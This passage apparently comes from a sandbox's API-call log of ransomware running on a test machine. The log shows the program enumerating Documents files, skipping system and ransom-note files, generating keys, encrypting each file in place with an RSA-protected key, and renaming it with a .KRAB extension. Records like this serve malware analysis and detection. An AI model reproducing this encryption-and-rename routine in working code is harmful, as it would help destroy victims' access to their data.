VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.197] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vz32vzlq0.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\VZ32vZLq0.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vz32vzlq0.xlsx.krab")) returned 1 [0092.198] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.198] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.198] lstrcmpW (lpString1="Wa8LD PjInNc.docx", lpString2=".") returned 1 [0092.199] lstrcmpW (lpString1="Wa8LD PjInNc.docx", lpString2="..") returned 1 [0092.199] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Wa8LD PjInNc.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx" [0092.199] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.199] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx.KRAB") returned 54 [0092.199] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx") returned 49 [0092.199] lstrlenW (lpString=".docx") returned 5 [0092.199] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.200] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0092.200] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.200] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx") returned 49 [0092.200] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx") returned 49 [0092.200] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="desktop.ini") returned 1 [0092.200] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="autorun.inf") returned 1 [0092.200] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="ntuser.dat") returned 1 [0092.200] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="iconcache.db") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="bootsect.bak") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="boot.ini") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="ntuser.dat.log") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="thumbs.db") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="ntldr") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="NTDETECT.COM") returned 1 [0092.201] lstrcmpiW (lpString1="Wa8LD PjInNc.docx", lpString2="Bootfont.bin") returned 1 [0092.201] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.201] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0092.202] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.203] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.203] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.238] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.238] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0092.238] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.238] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0092.241] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.243] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.244] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.244] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.244] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.244] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.244] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10114e0) returned 1 [0092.245] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0092.245] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.245] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.245] GetLastError () returned 0x0 [0092.245] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0092.245] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0092.245] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010f08) returned 1 [0092.246] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.246] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.246] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.246] GetLastError () returned 0x0 [0092.246] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.246] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0092.246] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\wa8ld pjinnc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.247] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.247] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.248] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x139e4, lpOverlapped=0x0) returned 1 [0092.289] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffec61c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.289] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x139e4, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x139e4, lpOverlapped=0x0) returned 1 [0092.290] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.290] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.311] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.312] CloseHandle (hObject=0x434) returned 1 [0092.312] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.313] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\wa8ld pjinnc.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Wa8LD PjInNc.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\wa8ld pjinnc.docx.krab")) returned 1 [0092.314] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.314] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.314] lstrcmpW (lpString1="WpJ6.ppt", lpString2=".") returned 1 [0092.314] lstrcmpW (lpString1="WpJ6.ppt", lpString2="..") returned 1 [0092.314] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="WpJ6.ppt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt" [0092.314] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.315] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt.KRAB") returned 45 [0092.315] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt") returned 40 [0092.315] lstrlenW (lpString=".ppt") returned 4 [0092.315] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.315] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ppt ") returned 5 [0092.315] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.316] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt") returned 40 [0092.316] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt") returned 40 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="desktop.ini") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="autorun.inf") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="ntuser.dat") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="iconcache.db") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="bootsect.bak") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="boot.ini") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="ntuser.dat.log") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="thumbs.db") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="KRAB-DECRYPT.html") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="ntldr") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="NTDETECT.COM") returned 1 [0092.316] lstrcmpiW (lpString1="WpJ6.ppt", lpString2="Bootfont.bin") returned 1 [0092.316] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.317] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0092.317] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.318] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.318] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.318] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.318] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.318] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.318] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0092.319] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.319] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.325] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.325] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.325] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0092.325] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.326] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.326] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.326] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.326] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.327] GetLastError () returned 0x0 [0092.327] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.327] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.327] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.327] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd560) returned 1 [0092.327] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.327] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.328] GetLastError () returned 0x0 [0092.328] CryptDestroyKey (hKey=0xfbd560) returned 1 [0092.328] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.328] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\wpj6.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.329] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.329] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.330] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x7617, lpOverlapped=0x0) returned 1 [0092.346] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff89e9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.346] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x7617, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x7617, lpOverlapped=0x0) returned 1 [0092.346] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.346] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.352] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.352] CloseHandle (hObject=0x434) returned 1 [0092.352] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.353] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\wpj6.ppt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\WpJ6.ppt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\wpj6.ppt.krab")) returned 1 [0092.353] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.354] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.354] lstrcmpW (lpString1="xN1EVc wlB0mW6.docx", lpString2=".") returned 1 [0092.354] lstrcmpW (lpString1="xN1EVc wlB0mW6.docx", lpString2="..") returned 1 [0092.354] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="xN1EVc wlB0mW6.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx" [0092.354] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.354] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx.KRAB") returned 56 [0092.354] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx") returned 51 [0092.354] lstrlenW (lpString=".docx") returned 5 [0092.355] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.355] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0092.355] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx") returned 51 [0092.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx") returned 51 [0092.355] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="desktop.ini") returned 1 [0092.355] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="autorun.inf") returned 1 [0092.355] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="ntuser.dat") returned 1 [0092.355] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="iconcache.db") returned 1 [0092.355] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="bootsect.bak") returned 1 [0092.355] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="boot.ini") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="ntuser.dat.log") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="thumbs.db") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="ntldr") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="NTDETECT.COM") returned 1 [0092.356] lstrcmpiW (lpString1="xN1EVc wlB0mW6.docx", lpString2="Bootfont.bin") returned 1 [0092.356] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.356] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10114e0) returned 1 [0092.357] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.357] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.357] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.357] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.357] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0092.358] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.358] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010f90) returned 1 [0092.358] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.359] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.359] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.359] CryptGenRandom (in: hProv=0x1010f90, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.359] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0092.359] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.360] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0092.360] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0092.360] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.360] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.361] GetLastError () returned 0x0 [0092.361] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0092.361] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0092.361] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.361] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd620) returned 1 [0092.361] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.362] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.365] GetLastError () returned 0x0 [0092.365] CryptDestroyKey (hKey=0xfbd620) returned 1 [0092.365] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.365] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\xN1EVc wlB0mW6.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\xn1evc wlb0mw6.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.368] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.399] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.400] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x16176, lpOverlapped=0x0) returned 1 [0092.610] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffe9e8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.611] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16176, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x16176, lpOverlapped=0x0) returned 1 [0092.611] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.611] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.626] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.636] CloseHandle (hObject=0x434) returned 1 [0092.637] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.637] MoveFileW 